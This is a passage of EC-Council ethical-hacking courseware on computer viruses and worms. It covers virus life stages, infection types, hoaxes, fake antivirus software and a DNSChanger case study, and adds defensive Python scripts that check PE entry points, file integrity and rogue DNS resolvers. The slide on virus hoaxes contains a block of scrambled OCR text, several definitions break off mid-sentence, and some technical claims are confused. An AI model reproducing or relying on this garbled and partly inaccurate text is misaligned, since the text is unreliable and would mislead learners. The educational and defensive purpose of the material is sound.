Module 07: Viruses and Worms
Ethical Hacking and Countermeasures v8
Exam 312-50
Module 07 Page 1007
Ethical Hacking and Countermeasures Copyright by EC-Council. All Rights Reserved. Reproduction is Strictly Prohibited.
Security News

October 19, 2012
Global Cyber-Warfare Tactics: New Flame-linked Malware used in Cyber-Espionage
Source: http://www.globalresearch.ca

A new cyber espionage program linked to the notorious Flame and Gauss malware has been detected by Russia's Kaspersky Lab. The antivirus giant's chief warns that global cyber warfare is in "full swing" and will probably escalate in 2013. The virus, dubbed miniFlame, and also known as SPE, has already infected computers in Iran, Lebanon, France, the United States, and Lithuania. It was discovered in July 2012 and is described as "a small and highly flexible malicious program designed to steal data and control infected systems during targeted cyber espionage operations," Kaspersky Lab said in a statement posted on its website. The malware was originally identified as an appendage of Flame - the program used for targeted cyber espionage in the Middle East and acknowledged to be part of joint US-Israeli efforts to undermine Iran's nuclear program. But later, Kaspersky Lab analysts discovered that miniFlame is an "interoperable tool that could be used as an independent malicious program, or concurrently as a plug-in for both the Flame and Gauss malware." The analysis also showed new evidence of cooperation between the creators of Flame and Gauss, as both viruses can use miniFlame for their operations. "MiniFlame's ability to be used as a plug-in by either Flame or Gauss clearly connects the collaboration between the development teams of both Flame and Gauss. Since the connection between Flame and Stuxnet/Duqu has already been revealed, it can be concluded that all these advanced threats come from the same 'cyber warfare' factory," Kaspersky Lab said.

High-precision attack tool

So far just 50 to 60 cases of infection have been detected worldwide, according to Kaspersky Lab. But unlike Flame and Gauss, miniFlame is meant for installation on machines already infected by those viruses. "MiniFlame is a high-precision attack tool. Most likely it is a targeted cyber weapon used in what can be defined as the second wave of a cyber attack," Kaspersky's Chief Security Expert Alexander Gostev explained. "First, Flame or Gauss are used to infect as many victims as possible to collect large quantities of information. After data is collected and reviewed, a potentially interesting victim is defined and identified, and miniFlame is installed in order to conduct more in-depth surveillance and cyber-espionage."

The newly-discovered malware can also take screenshots of an infected computer while it is running a specific program or application such as a web browser, Microsoft Office program, Adobe Reader, instant messenger service or FTP client. Kaspersky Lab believes miniFlame's developers have probably created dozens of different modifications of the program. "At this time, we have only found six of these, dated 2010-2011," the firm said.

Cyber warfare in full swing

Meanwhile, Kaspersky Lab's co-founder and CEO Eugene Kaspersky warned that global cyber warfare tactics are becoming more sophisticated while also becoming more threatening. He urged governments to work together to fight cyber warfare and cyber-terrorism, Xinhua news agency reports. Speaking at an International Telecommunication Union Telecom World conference in Dubai, the antivirus tycoon said, "cyber warfare is in full swing and we expect it to escalate in 2013." "The latest malicious virus attack on the world's largest oil and gas company, Saudi Aramco, last August shows how dependent we are today on the Internet and information technology in general, and how vulnerable we are," Kaspersky said. He stopped short of blaming any particular player behind the massive cyber-attacks across the Middle East, pointing out that "our job is not to identify hackers or cyber-terrorists. Our firm is like an X-ray machine, meaning we can scan and identify a problem, but we cannot say who or what is behind it." Iran, who confirmed that it suffered an attack by Flame malware that caused severe data loss, blames the United States and Israel for unleashing the cyber-attacks.

By Russia Today
http://www.globalresearch.ca/global-cyber-warfare-tactics-new-flame-linked-malware-used-in-cyber-espionage/5308867
Module Objectives

The objective of this module is to expose you to the various viruses and worms available today. It gives you information about all the available viruses and worms. This module examines the workings of a computer virus, its function, classification, and the manner in which it affects systems. This module will go into detail about the various countermeasures available to protect against these virus infections. The main objective of this module is to educate you about the available viruses and worms, the indications of their attack, the ways to protect against various viruses, and how to test your system or network for the presence of viruses or worms. This module will familiarize you with:

- Introduction to Viruses
- Stages of Virus Life
- Working of Viruses
- Indications of Virus Attack
- How Does a Computer Get Infected by Viruses
- Virus Analysis
- Types of Viruses
- Virus Maker
- Computer Worms
- Worm Analysis
- Worm Maker
- Malware Analysis Procedure
- Online Malware Analysis Services
- Virus and Worms Countermeasures
- Antivirus Tools
Module Flow

This section introduces you to various viruses and worms available today and gives you a brief overview of each virus and statistics of viruses and worms in the recent years. It lists various types of viruses and their effects on your system. The working of viruses in each phase will be discussed in detail. The techniques used by the attacker to distribute malware on the web are highlighted.

Module flow: Virus and Worms Concepts -> Types of Viruses -> Computer Worms -> Malware Analysis -> Countermeasures -> Penetration Testing
Introduction to Viruses

Virus characteristics: alters data, transforms itself, encrypts itself, self propagates.

Computer viruses have the potential to wreak havoc on both business and personal computers. Worldwide, most businesses have been infected at some point. A virus is a self-replicating program that produces its own code by attaching copies of itself into other executable codes. This virus operates without the knowledge or desire of the user. Like a real virus, a computer virus is contagious and can contaminate other files. However, viruses can infect outside machines only with the assistance of computer users. Some viruses affect computers as soon as their code is executed; other viruses lie dormant until a pre-determined logical circumstance is met. There are three categories of malicious programs:

- Trojans and rootkits
- Viruses
- Worms
Virus and Worm Statistics

Source: http://www.av-test.org

Figure: Virus and worm statistics, 2008 to 2012 (systems affected, y-axis 0 to 75,000,000)

This graphical representation gives detailed information of the attacks that have occurred in the recent years. According to the graph, only 11,666,667 systems were affected by viruses and worms in the year 2008, whereas in the year 2012, the count drastically increased to 70,000,000 systems, which means that the growth of malware attacks on systems is increasing exponentially year by year.
Stages of Virus Life

Computer virus attacks spread through various stages from inception to design to elimination.

1. Design: A virus code is developed by using programming languages or construction kits. Anyone with basic programming knowledge can create a virus.
2. Replication: A virus first replicates itself within a target system over a period of time, and then spreads itself.
3. Launch: It is activated when a user performs certain actions such as triggering or running an infected program.
4. Detection: A virus is identified as a threat infecting target systems. Its actions cause considerable damage to the target system's data.
5. Incorporation: Antivirus software developers assemble defenses against the virus.
6.
Working of Viruses: Infection Phase

Generally, viruses have two phases, the infection phase and the attack phase. In the infection phase, the virus replicates itself and attaches to an .exe file in the system. Programs modified by a virus infection can enable virus functionalities to run on that system. Viruses get enabled as soon as the infected program is executed, since the program code leads to the virus code. Virus writers have to maintain a balance among factors such as: How will the virus infect? How will it spread? How will it reside in a target computer's memory without being detected?

programs do not infect the programs when first executed. They reside in a computer's memory and infect programs at a later time. Such virus programs, known as TSR programs, wait for a specified trigger event to spread at a later stage. It is, therefore, difficult to recognize which event might trigger the execution of a dormant virus infection. Refer to the figure that follows to see how the EXE file infection works. In the following figure, the .EXE file's header, when triggered, executes and starts running the application. Once this file is infected, any trigger event from the file's header can activate the virus code too, along with the application program, as soon as it is run.

- A file virus infects by attaching itself to an executable system application program. Text files such as source code, batch files, script files, etc., are considered potential targets for virus infections.
- Boot sector viruses execute their own code in the first place, before the target PC is booted.

Figure: EXE file infection. Before infection: clean .exe file. After infection: virus-infected file.
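As an added example (not from the courseware), the Python below parses a PE header and reports which section holds the entry point, the defender's counterpart to the EXE header infection described above: an appending file infector redirects the header's entry point into the section it added, so an entry point that lands in the last section rather than in the first code section is a classic triage signal. The PE samples are constructed in the script; the section names .text, .data and .added are arbitrary.

```python
import struct

# Section characteristic flags from the PE/COFF specification.
IMAGE_SCN_CNT_CODE = 0x00000020
IMAGE_SCN_MEM_EXECUTE = 0x20000000
IMAGE_SCN_MEM_READ = 0x40000000
IMAGE_SCN_MEM_WRITE = 0x80000000


def parse_pe(data):
    """Return (entry_rva, sections) from the bytes of a PE file.

    Each section is a dict with name, vaddr, vsize and chars. Raises
    ValueError for input that does not carry a well-formed PE header.
    """
    if data[:2] != b"MZ":
        raise ValueError("missing MZ signature")
    e_lfanew = struct.unpack_from("<I", data, 0x3C)[0]
    if data[e_lfanew:e_lfanew + 4] != b"PE\0\0":
        raise ValueError("missing PE signature")
    coff = e_lfanew + 4
    # COFF header: NumberOfSections at +2, SizeOfOptionalHeader at +16.
    num_sections, opt_size = struct.unpack_from("<2xH12xH2x", data, coff)
    opt = coff + 20
    magic = struct.unpack_from("<H", data, opt)[0]
    if magic not in (0x10B, 0x20B):  # PE32 or PE32+
        raise ValueError("unknown optional header magic 0x%x" % magic)
    entry_rva = struct.unpack_from("<I", data, opt + 16)[0]  # AddressOfEntryPoint
    sections = []
    for i in range(num_sections):
        name, vsize, vaddr, _raw_size, _raw_ptr, chars = struct.unpack_from(
            "<8sIIII12xI", data, opt + opt_size + i * 40)
        sections.append({"name": name.rstrip(b"\0").decode("ascii", "replace"),
                         "vaddr": vaddr, "vsize": vsize, "chars": chars})
    return entry_rva, sections


def check_entry_point(data):
    """Heuristic verdict on where the entry point lives.

    Returns (suspicious, reason, section_name). An infector that appends
    its body and rewrites the header's entry point leaves the entry point
    in the last section instead of the first code section.
    """
    entry_rva, sections = parse_pe(data)
    holder = None
    for s in sections:
        if s["vaddr"] <= entry_rva < s["vaddr"] + max(s["vsize"], 1):
            holder = s
            break
    if holder is None:
        return True, "entry point outside every section", None
    name = holder["name"]
    code = [s for s in sections if s["chars"] & IMAGE_SCN_MEM_EXECUTE]
    if holder["chars"] & IMAGE_SCN_MEM_WRITE:
        return True, "entry point in a writable section", name
    if len(sections) > 1 and holder is sections[-1]:
        return True, "entry point in the last (appended) section", name
    if code and holder is not code[0]:
        return True, "entry point not in the first code section", name
    return False, "entry point in first code section", name


def build_pe(entry_rva, sections):
    """Construct a minimal PE32 header (headers only, no code) for the demo.

    sections is a list of (name, vaddr, vsize, chars). Constructed test
    data only; it is not a runnable executable.
    """
    opt_size = 224  # size of a PE32 optional header
    dos = b"MZ" + b"\0" * (0x3C - 2) + struct.pack("<I", 0x40)  # e_lfanew = 0x40
    coff = struct.pack("<HHIIIHH", 0x14C, len(sections), 0, 0, 0, opt_size, 0x102)
    opt = bytearray(opt_size)
    struct.pack_into("<H", opt, 0, 0x10B)       # PE32 magic
    struct.pack_into("<I", opt, 16, entry_rva)  # AddressOfEntryPoint
    table = b"".join(
        struct.pack("<8sIIIIIIHHI", n.encode(), vs, va, vs, 0, 0, 0, 0, 0, ch)
        for n, va, vs, ch in sections)
    return dos + b"PE\0\0" + coff + bytes(opt) + table


CODE = IMAGE_SCN_CNT_CODE | IMAGE_SCN_MEM_EXECUTE | IMAGE_SCN_MEM_READ
DATA = IMAGE_SCN_MEM_READ | IMAGE_SCN_MEM_WRITE

# Constructed samples: a normal layout, and the same layout after a file
# infector appended a section and pointed the entry point at it.
CLEAN_PE = build_pe(0x1010, [(".text", 0x1000, 0x2000, CODE),
                             (".data", 0x3000, 0x1000, DATA)])
INFECTED_PE = build_pe(0x4000, [(".text", 0x1000, 0x2000, CODE),
                                (".data", 0x3000, 0x1000, DATA),
                                (".added", 0x4000, 0x200, CODE)])

if __name__ == "__main__":
    for label, pe in (("clean", CLEAN_PE), ("infected", INFECTED_PE)):
        print(label, check_entry_point(pe))
```

Packers and some linkers also place the entry point in an unusual section, so treat a hit as a reason to look closer, not as a verdict on its own.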
Working of Viruses: Attack Phase

Viruses are programmed with trigger events to activate and corrupt systems. Some viruses infect each time they are run and others infect only when a certain predefined condition is met, such as a user's specific task, a day, a time, or a particular event.

Once viruses spread themselves throughout the target system, they start corrupting the files and programs of the host system. Some viruses have trigger events that need to be activated to corrupt the host system. Some viruses have bugs that replicate themselves, and perform activities such as deleting files and increasing session time. They corrupt their targets only after spreading as intended by their developers. Most viruses that attack target systems perform actions such as:

- Deleting files and altering content in data files, thereby causing the system to slow down
- Performing tasks not related to applications, such as playing music and creating animations

FIGURE 7.3: Working of Viruses in Attack Phase

Unfragmented file before attack:
File A: Page 1, Page 2, Page 3
File B: Page 1, Page 2, Page 3

File fragmented due to virus attack:
Page 1 (File A), Page 3 (File B), Page 1 (File B), Page 3 (File A), Page 2 (File B), Page 2 (File A)

Refer to this figure, which has two files, A and B. In section one, the two files are located one after the other in an orderly fashion. Once a virus code infects the file, it alters the positioning of the files that were consecutively placed, thus leading to inaccuracy in file allocations, causing the system to slow down as users try to retrieve their files. In this phase:

- Viruses execute when some events are triggered
- Some execute and corrupt via built-in bug programs after being stored in the host's memory
- Most viruses are written to conceal their presence, attacking only after spreading in the host to the fullest extent
Why Do People Create Computer Viruses?

Source: http://www.securitydocs.com

Computer viruses are not self-generated, but are created by cyber-criminal minds, intentionally designed to cause destructive occurrences in a system. Generally, viruses are created with a disreputable motive. Cyber-criminals create viruses to destroy a company's data, as an act of vandalism or a prank, or to destroy a company's products. However, in some cases, viruses are actually intended to be good for a system. These are designed to improve a system's performance by deleting previously embedded viruses from files. Some reasons viruses have been written include:

- Inflict damage to competitors
- Research projects
- Pranks
- Vandalism
- Attack the products of specific companies
- Distribute political messages
- Financial gain
- Cyber terrorism
Indications of Virus Attacks

An effective virus tends to multiply rapidly and may infect a number of machines within three to five days. Viruses can infect Word files which, when transferred, can infect the machines of the users who receive them. A virus can also make good use of file servers in order to infect files. The following are indications of a virus attack on a computer system:

- Programs take longer to load
- The hard drive is always full, even without installing any programs
- The floppy disk drive or hard drive runs when it is not being used
- Unknown files keep appearing on the system
- The keyboard or the computer emits strange or beeping sounds
- The computer monitor displays strange graphics
- File names turn strange, often beyond recognition
- The hard drive becomes inaccessible when trying to boot from the floppy drive
- A program's size keeps changing
- The memory on the system seems to be in use and the system slows down
- Processes take more resources and time
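As an added example (not from the courseware), a baseline-and-compare check in Python that turns three of the indications above (unknown files appearing, a program's size changing, files vanishing) into something a scheduled job can flag instead of a user's hunch. The directory and the files in it are constructed in a temporary folder by the script.

```python
import hashlib
import os
import tempfile


def snapshot(root):
    """Record size and SHA-256 of every regular file under root, keyed by
    the path relative to root (with '/' separators). Take this baseline on
    a known-clean system and keep it off the host: a virus that can alter
    programs can also alter a baseline stored beside them."""
    baseline = {}
    for dirpath, _dirs, files in os.walk(root):
        for name in files:
            full = os.path.join(dirpath, name)
            if os.path.islink(full) or not os.path.isfile(full):
                continue
            digest = hashlib.sha256()
            with open(full, "rb") as fh:
                for chunk in iter(lambda: fh.read(1 << 16), b""):
                    digest.update(chunk)
            rel = os.path.relpath(full, root).replace(os.sep, "/")
            baseline[rel] = {"size": os.path.getsize(full),
                             "sha256": digest.hexdigest()}
    return baseline


def compare(baseline, current):
    """Diff two snapshots into the indicators named in the text: unknown
    files appearing, files disappearing, and program contents or sizes
    changing."""
    report = {"added": [], "removed": [], "modified": []}
    for rel in sorted(set(baseline) | set(current)):
        if rel not in baseline:
            report["added"].append(rel)
        elif rel not in current:
            report["removed"].append(rel)
        elif baseline[rel] != current[rel]:
            report["modified"].append({
                "path": rel,
                "size_delta": current[rel]["size"] - baseline[rel]["size"]})
    return report


def demo():
    """Constructed scenario in a temporary directory: baseline two
    programs, then reproduce two of the indications above (a program grows
    by 512 bytes, an unknown file appears) and diff against the baseline."""
    with tempfile.TemporaryDirectory() as root:
        bin_dir = os.path.join(root, "bin")
        os.makedirs(bin_dir)
        with open(os.path.join(bin_dir, "app.exe"), "wb") as fh:
            fh.write(b"MZ" + b"\x90" * 1000)   # stand-in for a program
        with open(os.path.join(bin_dir, "tool.exe"), "wb") as fh:
            fh.write(b"MZ" + b"\xcc" * 500)
        baseline = snapshot(root)

        with open(os.path.join(bin_dir, "app.exe"), "ab") as fh:
            fh.write(b"\x00" * 512)             # appended bytes change size and hash
        with open(os.path.join(bin_dir, "unknown.exe"), "wb") as fh:
            fh.write(b"MZ" + b"\x00" * 64)      # file that was not in the baseline
        return compare(baseline, snapshot(root))


if __name__ == "__main__":
    print(demo())
```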
How Does a Computer Get Infected by Viruses?

There are many ways in which a computer gets infected by viruses. The most popular methods are as follows:

- When a user accepts files and downloads without checking properly for the source.
- Opening infected e-mail attachments. Attackers usually send virus-infected files as email attachments to spread the virus on the victim's system. If the victim opens the mail, the virus automatically infects the system.
- Installing pirated software. Attackers incorporate viruses in popular software programs and upload the infected software on websites intended to download software. When the victim downloads infected software and installs it, the system gets infected.
- Not updating and not installing new versions of plug-ins. Failing to install new versions or update with the latest patches intended to fix the known bugs may expose your system to viruses.
- Not running the latest anti-virus application. With the increasing technology, attackers also are designing new viruses. Failing to use the latest antivirus applications may expose you to virus attacks.
Common Techniques Used to Distribute Malware on the Web

Source: Security Threat Report 2012 (http://www.sophos.com)

- Blackhat Search Engine Optimization (SEO): Using this technique the attacker ranks malware pages high in search results
- Social Engineered Click-jacking: The attackers trick the users into clicking on innocent-looking web pages that contain malware
- Spearphishing Sites: This technique is used for mimicking legitimate institutions, such as banks, in an attempt to steal account login credentials
- Malvertising: Embeds malware in ad networks that display across hundreds of legitimate, high traffic sites
- Compromised Legitimate Websites: Host embedded malware that spreads to unsuspecting visitors
- Drive-by Downloads: The attacker exploits flaws in browser software to install malware just by visiting a web page
V i r u s
H o a x e s
a n d
F a k e
A n t i v i r u s e s
H o ax es a r e f a l s e a l a r m s c la im in g r e p o r t s a b o u t a n o n - e x i s t in g v ir u s w h ic h m a y c o n ta in v iru s a t t a c h m e n t s
tifai*ft-F0R W A I1r)T14l'W A N IN flA M 0N n'R lFN 0V tA M IIV A N nrO N TA rn ntAsc rm v/Aflo mu warningamong rnitN D S.rA M iivandcontactsHo* houMt* w * t d*'* tk*mat rwJw vvC oikxcptn y w ith4 1 1*tM chm vHvntltfv O> O S T C A R O'R O MU ir.O R tS IO N A T IO NO fB A R A C K O B A M A. ifgjrdlM iO fW hOS n t It to you Itft J V lfU S tfU t0p1A humiahi, imaoi, m n tornsthew hole run)c dsc you com puter. rih b 1 1 W W IN M M l4 1 > IU U IIL v OU y C M N U lU I1 IKHid) U 1llO tlTMjfMlllWA I' H U M
***
1 1
0 1
dtstr jctivtvirM^ver Theviiw ... .discovered bv McAfee vtdiv. nd thpp 1 4nor tear jc for :h i
1 >
t S e Z e t o S e t t o f a l U i e l l o d D i M . ,m I i v i c t l . rv i u l x i f o i m a t b o n k v L
w -
j y
| r J
! ! L
i f s r s r *
==
V ir u s
H o a x e s
a n d
F a k e
A n tiv ir u s e s
V iru s H o a x e s A v ir u s h o a x is s i m p l y a b lu ff. V iru s e s , by t h e i r n a t u r e , h a v e a lw a y s c r e a te d a h o r r i f y i n g i m p r e s s io n . H oa x es a re t y p i c a l l y u n t r u e sca re a le r t s t h a t u n s c r u p u l o u s in d iv id u a ls s e n d t o c r e a te h a v o c . It is f a i r l y c o m m o n f o r i n n o c e n t users t o pass th e s e p h o n y m essa ge s a lo n g t h i n k i n g t h e y a re h e lp in g o t h e r s a v o id t h e " v i r u s . " 0 0 H oa xes a re fa lse a la r m s c la im in g r e p o r t s a b o u t n o n - e x i s t i n g v iru s e s T he se w a r n i n g m essages, w h i c h can b e p r o p a g a t e d r a p id ly , s t a t in g t h a t ac e r ta in m e s s a g e s h o u ld n o t be o p e n e d , a n d t h a t d o i n g so w o u l d d a m a g e o n e 's s y s te m 0 0 In s o m e cases, th e s e w a r n i n g m essa ge s t h e m s e l v e s c o n t a i n v iru s a t t a c h m e n t s T he se possess t h e c a p a b i l it y o f v a s t d e s t r u c t i o n o n t a r g e t s y s te m s e m a il
Many hoaxes try to "sell" things that are technically nonsense. Nevertheless, the hoaxer has to be somewhat of an expert to spread hoaxes in order to avoid being identified and caught. Therefore, it is a good practice to look for technical details about how to become infected. Also search for information in the wild to learn more about the hoax, especially by scanning bulletin boards where people actively discuss current happenings in the community.
Try to cross check the identity of the person who has posted the warning. Also look for more information about the hoax/warning from secondary sources. Before jumping to conclusions by reading certain documents on the Internet, check the following:

- If it is posted by newsgroups that are suspicious, cross check the information with another source.
- If the person who has posted the news is not a known person in the community or an expert, cross check the information with another source.
- If a government body has posted the news, the posting should also have a reference to the corresponding federal regulation.
- One of the most effective checks is to look up the suspected hoax virus by name on antivirus software vendor sites.
- If the posting is technical, hunt for sites that would cater to the technicalities, and try to authenticate the information.

Sample hoax message shown on the slide:

Subject: FORWARD THIS WARNING AMONG FRIENDS, FAMILY AND CONTACTS

PLEASE FORWARD THIS WARNING AMONG FRIENDS, FAMILY AND CONTACTS! You should be alert during the next few days. Do not open any message with an attachment entitled 'POSTCARD FROM BEJING' or 'RESIGNATION OF BARACK OBAMA', regardless of who sent it to you. It is a virus that opens A POSTCARD IMAGE, then 'burns' the whole hard C disc of your computer. This is the worst virus announced by CNN last evening. It has been classified by Microsoft as the most destructive virus ever. The virus was discovered by McAfee yesterday, and there is no repair yet for this kind of virus. This virus simply destroys the Zero Sector of the Hard Disc, where the vital information is kept. COPY THIS EMAIL, AND SEND IT TO YOUR FRIENDS. REMEMBER: IF YOU SEND IT TO THEM, YOU WILL BENEFIT ALL OF US. End-of-mail Thanks.
Fake Antiviruses

Fake antivirus software is a method attackers use to compromise a system: it can poison the system, corrupt the registry and system files, and allow the attacker to take full control of and access to your computer. It appears and performs similarly to a real antivirus program. Fake antivirus programs first appear in different browsers and warn users that they have various security threats on their system, and this message is backed up by real suspicious viruses. When the user tries to remove the viruses, they are navigated to another page where they need to buy or subscribe to that antivirus and proceed to payment details. These fake antivirus programs are fabricated in such a way that they draw the attention of the unsuspecting user into installing the software. Some of the methods used to extend the usage and installation of fake antivirus programs include:

- Email and messaging: Attackers use spam email and social networking messages to spread this type of infected email to users and prod the user to open the attachments for software installation.
- Search engine optimization: Attackers generate pages related to public or current search terms and plant them to appear as extraordinary and the latest in search engine results. The web pages show alerts about infection that encourage the user to buy the fake antivirus.
- Compromised websites: Attackers secretly break into popular sites to install the fake antiviruses, which can be used to entice users to download the fake antivirus by relying on the site's popularity.
Virus Analysis: DNSChanger

- It acts as a bot and can be organized into a botnet and controlled from a remote location
- It spreads through emails, social engineering tricks, and untrusted downloads from the Internet

Source: http://www.totaldefense.com

DNSChanger (Alureon) is malware that spreads through emails, social engineering tricks, and untrusted downloads from the Internet. It acts as a bot and can be organized into a botnet and controlled from a remote location. This malware achieves DNS redirection by modifying the system registry key settings for an interface device such as a network card. DNSChanger has received significant attention due to the large number of affected systems worldwide and the fact that, as part of the botnet takedown, the FBI took ownership of the rogue DNS servers to ensure those affected did not immediately lose the ability to resolve DNS names. It can even modify the DNS settings on the victim's PC to divert Internet traffic to malicious websites in order to generate fraudulent ad revenue, sell fake services, or steal personal financial information.
Virus Analysis: DNSChanger (Contd)

Source: http://www.totaldefense.com

The rogue DNS servers can exist in any of the following ranges:

64.28.176.0 - 64.28.191.255
67.210.0.0 - 67.210.15.255
77.67.83.0 - 77.67.83.255
93.188.160.0 - 93.188.167.255
85.255.112.0 - 85.255.127.255
213.109.64.0 - 213.109.79.255

Slide figure (DNSChanger attack flow): the attacker runs a DNS server in Russia at 64.28.176.2; DNSChanger infects the victim's computer by changing her DNS IP address to 64.28.176.2; the victim's DNS request is sent to 64.28.176.2; the fake website has IP 65.0.0.2; DNSChanger sniffs the credential and redirects the request to the real website www.xsecurity.com (IP 200.0.0.45).
To infect the system and steal credentials, the attacker has to first run a DNS server. Here the attacker runs his or her DNS server in Russia with an IP of, say, 64.28.176.2. Next, the attacker infects the victim's computer by changing his or her DNS IP address to 64.28.176.2. When this malware has infected the system, it entirely changes the DNS settings of the infected machine and forces all DNS requests to go to the DNS server run by the attacker. After altering the setting of the DNS, any request that is made by the system is sent to the malicious DNS server. Here, the victim sends the DNS request "what is the IP address of www.xsecurity.com" to
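As an added example (not part of the original courseware or of the Total Defense write-up), the following Python script turns the rogue ranges listed above into a check a responder can run against a host's configured resolvers. It assumes the resolvers were exported with `reg query` from the per-interface TCP/IP `Interfaces` key, where Windows stores the `NameServer` value; the sample output, interface GUIDs and the non-rogue resolver address below are constructed for the example.

```python
import ipaddress
import re

# Rogue DNS server ranges exactly as listed on the slide (inclusive start-end).
ROGUE_RANGES = [
    ("64.28.176.0", "64.28.191.255"),
    ("67.210.0.0", "67.210.15.255"),
    ("77.67.83.0", "77.67.83.255"),
    ("93.188.160.0", "93.188.167.255"),
    ("85.255.112.0", "85.255.127.255"),
    ("213.109.64.0", "213.109.79.255"),
]

# Convert each start-end pair into the CIDR networks that cover it exactly.
ROGUE_NETWORKS = [
    net
    for start, end in ROGUE_RANGES
    for net in ipaddress.summarize_address_range(
        ipaddress.ip_address(start), ipaddress.ip_address(end)
    )
]


def is_rogue_dns(ip: str) -> bool:
    """True if the resolver address falls inside one of the listed rogue ranges."""
    try:
        addr = ipaddress.ip_address(ip)
    except ValueError:
        return False  # not an IP literal; nothing to match against
    return any(addr in net for net in ROGUE_NETWORKS)


# Constructed sample of `reg query` output for the per-interface TCP/IP settings.
# The key path and the NameServer value are the real locations Windows uses for
# statically configured resolvers; GUIDs and addresses are made up for the example.
SAMPLE_REG_OUTPUT = r"""
HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\Tcpip\Parameters\Interfaces\{AAAA1111-0000-0000-0000-000000000001}
    NameServer    REG_SZ    64.28.176.2,64.28.176.3
    EnableDHCP    REG_DWORD    0x0

HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\Tcpip\Parameters\Interfaces\{AAAA1111-0000-0000-0000-000000000002}
    NameServer    REG_SZ    192.0.2.53
    EnableDHCP    REG_DWORD    0x1
"""

_KEY_RE = re.compile(r"^HKEY_LOCAL_MACHINE\\.*\\Interfaces\\(\{[0-9A-Fa-f-]+\})\s*$")
_NS_RE = re.compile(r"^\s*NameServer\s+REG_SZ\s+(.*?)\s*$")


def audit_reg_output(text: str) -> dict:
    """Map each interface GUID to the list of its resolvers that sit in a rogue range."""
    findings = {}
    current = None
    for line in text.splitlines():
        key = _KEY_RE.match(line)
        if key:
            current = key.group(1)
            continue
        ns = _NS_RE.match(line)
        if ns and current:
            # NameServer holds a comma- or space-separated list of resolver addresses.
            servers = [s for s in re.split(r"[,\s]+", ns.group(1)) if s]
            rogue = [s for s in servers if is_rogue_dns(s)]
            if rogue:
                findings[current] = rogue
    return findings


if __name__ == "__main__":
    for guid, servers in audit_reg_output(SAMPLE_REG_OUTPUT).items():
        print(f"interface {guid}: rogue resolver(s) {', '.join(servers)}")
```

Only the first constructed interface is reported, because 192.0.2.53 lies outside every listed range; a DHCP-assigned resolver would not appear in `NameServer`, so the same check should also be run against the `DhcpNameServer` value if the interface uses DHCP.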
Module Flow

- Virus and Worms Concepts
- Types of Viruses
- Computer Worms
- Malware Analysis
- Countermeasures
- Penetration Testing
Types of Viruses

Types shown on the slide: System or Boot Sector Viruses, Metamorphic, Cluster Viruses, Sparse Infector Virus, Multipartite, Direct Action or Transient.

So far, we have discussed various virus and worm concepts. Now we will discuss various types of viruses.

This section highlights various types of viruses and worms such as file and multipartite viruses, macro viruses, cluster viruses, stealth/tunneling viruses, encryption viruses, metamorphic viruses, shell viruses, and so on. Computer viruses are the malicious software programs written by attackers to intentionally enter the targeted system without the user's permission. As a result, they affect the security system and performance of the machine. A few of the most common types of computer viruses that adversely affect security systems are discussed in detail on the following slides.
What Do They Infect?

System or Boot Sector Viruses: The most common targets for a virus are the system sectors, which are nothing but the Master Boot Record and the DOS Boot Record system sectors. These are the areas on the disk that are executed when the PC is booted. Every disk has a system sector of some sort. They specially infect the floppy boot sectors and records of the hard disk. For example: Disk Killer and Stone virus.

File Viruses: Executable files are infected by file viruses, as they insert their code into the original file and get executed. File viruses are larger in number, but they are not the most commonly found. They infect in a variety of ways and can be found in a large number of file types.

Multipartite Virus: They infect program files, and this file in turn affects the boot sectors; examples are Invader, Flip, and Tequila.

Cluster Viruses: Cluster viruses infect files without changing the file or planting extra files; they change the DOS directory information so that entries point to the virus code instead of the actual program.

Macro Virus: Microsoft Word or a similar application can be infected through a computer virus called a macro virus, which automatically performs a sequence of actions when the application is triggered or something else. Macro viruses are somewhat less harmful than other types. They are usually spread via an email.

How Do They Infect?

Stealth Viruses: These viruses try to hide themselves from antivirus programs by actively altering and corrupting the chosen service call interrupts when they are being run. Requests to perform operations in respect to these service call interrupts are replaced by virus code. These viruses state false information to hide their presence from antivirus programs. For example, the stealth virus hides the operations that it modified and gives false representations. Thus, it takes over portions of the target system and hides its virus code.

Tunneling Viruses: These viruses trace the steps of interceptor programs that monitor operating system

Encryption Viruses: The decrypting module remains constant, whereas the different keys are used for encryption.

Polymorphic Viruses: These viruses were developed to confuse antivirus programs that scan for viruses in the system. It is difficult to trace them, since they change their characteristics each time they infect, e.g., every copy of this virus differs from its previous one. Virus developers have even created metamorphic engines and virus writing toolkits that make the code of an existing virus look different from others of its kind.

Metamorphic Viruses: A code that can reprogram itself is called metamorphic code. This code is translated into the temporary code, and then converted back to the normal code. This technique, in which the original algorithm remains intact, is used to avoid pattern recognition of antivirus software. This is more effective in comparison to polymorphic code. This type of virus consists of complex extensive code.

Overwriting File or Cavity Viruses: Some program files have areas of empty space. This empty space is the main target of these viruses. The Cavity Virus, also known as the Space Filler Virus, stores its code in this empty space. The virus installs itself in this unoccupied space without any destruction to the original code. It installs itself in the file it attempts to infect.

Sparse Infector Viruses:

They disguise themselves as genuine applications

compared to an "eggshell," making itself the original program and the host code its subroutine. Here, the original code is moved to a new location by the virus code and the virus assumes its identity.

File Extension Viruses: File extension viruses change the extensions of files; .TXT is safe, as it indicates a pure text file. If your computer's file extensions view is turned off and someone sends you a file named BAD.TXT.VBS, you will see only BAD.TXT.

Add-on Viruses: Most viruses are add-on viruses. This type of virus appends its code to the beginning of the host code without making any changes to the latter. Thus, the virus corrupts the startup information of the host code and places itself in its place, but it does not touch the host code. However, the virus code is executed before the host code. The only indication that the file is corrupted is that the size of the file has increased.

Intrusive Viruses: This form of virus overwrites its code either by completely removing the target host's program code, or sometimes it only overwrites part of it. Therefore, the original code is not executed properly.

Direct Action or Transient Viruses: Transfers all control to the host code where it resides, selects the target program to be modified, and corrupts it.

Terminate and Stay Resident Viruses (TSRs): A TSR virus remains permanently in memory during the entire work session, even after the target host program is executed and terminated. It can be removed only by rebooting the system.
System or Boot Sector Viruses

Slide figure: Boot Sector Virus Execution (Before Infection / After Infection), Virus Code, MBR.

System sector viruses can be defined as those that affect the executable code of the disk, rather than the boot sector virus that affects the DOS boot sector of the disk. Any system is divided into areas, called sectors, where the programs are stored. The two types of system sectors are:

- MBR (Master Boot Record): MBRs are the most virus-prone zones because if the MBR is corrupted, all data will be lost.
- DBR (DOS Boot Record): The DOS boot sector is executed whenever the system is booted. This is the crucial point of attack for viruses.

